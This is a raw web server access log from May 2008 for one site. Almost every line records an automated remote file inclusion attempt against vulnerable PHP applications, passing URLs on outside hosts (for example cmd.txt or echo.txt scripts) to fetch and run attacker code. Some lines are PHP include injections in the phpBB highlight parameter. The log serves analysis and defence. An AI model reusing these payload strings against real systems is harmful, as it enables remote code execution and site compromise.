65.38.105.133 - - [06/May/2008:09:24:03 -0700] "GET /logs/access_080315.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:24:05 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:24:12 -0700] "GET /logs/access_080220.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:09:24:37 -0700] "GET /logs/access_080302.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:24:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
121.88.4.5 - - [06/May/2008:09:24:40 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:25:04 -0700] "GET /logs/access_080315.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:25:09 -0700] "GET /logs/access_080220.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:09:25:16 -0700] "GET //index2.php?option=com_events&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:09:25:16 -0700] "GET /logs//index2.php?option=com_events&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:09:25:59 -0700] "GET /logs/access_080311.log/oneadmin/common/include.php?path[docroot]=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:09:25:59 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:09:26:00 -0700] "GET /logs/oneadmin/common/include.php?path[docroot]=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:26:29 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:26:29 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:26:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:26:33 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
98.130.2.11 - - [06/May/2008:09:26:34 -0700] "GET /logs/index.php?redir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.11 - - [06/May/2008:09:26:36 -0700] "GET /index.php?redir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:26:47 -0700] "GET /logs/index1.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:26:51 -0700] "GET /index1.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:27:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:27:11 -0700] "GET /logs/access_080131.log//squirrelcart/cart_content.php?cart_isp_root=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:27:18 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:27:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:27:19 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:27:22 -0700] "GET /logs/access_080213.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:27:22 -0700] "GET /logs/access_080324.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:27:22 -0700] "GET /logs/access_080315.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:27:23 -0700] "GET /logs/access_080220.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:27:32 -0700] "GET /logs/access_080215.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:27:32 -0700] "GET //&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:27:32 -0700] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.76.116.20 - - [06/May/2008:09:28:05 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [06/May/2008:09:28:07 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:15 -0700] "GET /logs/access_080213.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:15 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:15 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:15 -0700] "GET /logs/access_080324.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:28:36 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:28:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:28:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:45 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:28:46 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:28:52 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:28:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:29:05 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:29:30 -0700] "GET /logs/access_080131.log/index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:29:30 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:29:31 -0700] "GET /index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:29:31 -0700] "GET /logs/index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:29:34 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:29:41 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:30:12 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:30:26 -0700] "GET /logs/access_080229.log/index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:31:09 -0700] "GET /logs/access_080201.log//akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:31:09 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:31:09 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:31:11 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:31:27 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:09:31:30 -0700] "GET //account.php?action=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:31:34 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:31:34 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:31:34 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:31:34 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:31:43 -0700] "GET /logs/access_080213.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:31:44 -0700] "GET /logs/access_080324.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:32:18 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:09:32:45 -0700] "GET /logs/index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:09:32:50 -0700] "GET /index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:33:07 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:33:08 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:33:12 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 50 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:33:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:33:42 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:09:35:32 -0700] "GET /index.php?pag=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:35:44 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:09:35:54 -0700] "GET /logs/index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:09:36:03 -0700] "GET /index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [06/May/2008:09:36:18 -0700] "GET /logs/access_080223.log/oneadmin/common/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.30.179.247 - - [06/May/2008:09:36:21 -0700] "GET /logs/access_080308.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:09:36:47 -0700] "GET /logs/access_080312.log/oneadmin/common/include.php?path[docroot]=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:09:36:48 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:09:36:48 -0700] "GET /logs/oneadmin/common/include.php?path[docroot]=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:37:02 -0700] "GET //podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:37:04 -0700] "GET /logs//podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:37:07 -0700] "GET /logs/services.php?page=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:37:10 -0700] "GET /services.php?page=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:38:50 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:38:54 -0700] "GET /adult/modules/TotalCalendar/about.php=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:38:54 -0700] "GET /logs/adult/modules/TotalCalendar/about.php=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:38:55 -0700] "GET /logs//language.inc.php?langs_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:38:55 -0700] "GET /web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:38:55 -0700] "GET //language.inc.php?langs_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:39:29 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:39:30 -0700] "GET /logs/access_080308.log/index.php?side=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:39:34 -0700] "GET /index.php?side=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:39:35 -0700] "GET /logs/index.php?side=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.242.98.48 - - [06/May/2008:09:39:54 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.98.48 - - [06/May/2008:09:39:55 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:39:57 -0700] "GET /logs/access_080223.log/web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:39:58 -0700] "GET /web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:39:58 -0700] "GET /logs/web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:40:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
212.114.10.247 - - [06/May/2008:09:40:13 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.joostmulders.nl/language/doy.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:40:14 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.joostmulders.nl/language/doy.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:40:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:40:47 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:40:47 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:40:49 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:40:49 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:40:51 -0700] "GET /logs/home.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:40:52 -0700] "GET /home.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.31 - - [06/May/2008:09:41:03 -0700] "GET /logs/access_080113.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:41:06 -0700] "GET /logs/errors.php?error=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:41:06 -0700] "GET /errors.php?error=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.220.51 - - [06/May/2008:09:41:25 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [06/May/2008:09:41:25 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:42:03 -0700] "GET /logs/homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:42:03 -0700] "GET /homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:42:07 -0700] "GET /logs/index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:42:08 -0700] "GET /logs/index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:42:08 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
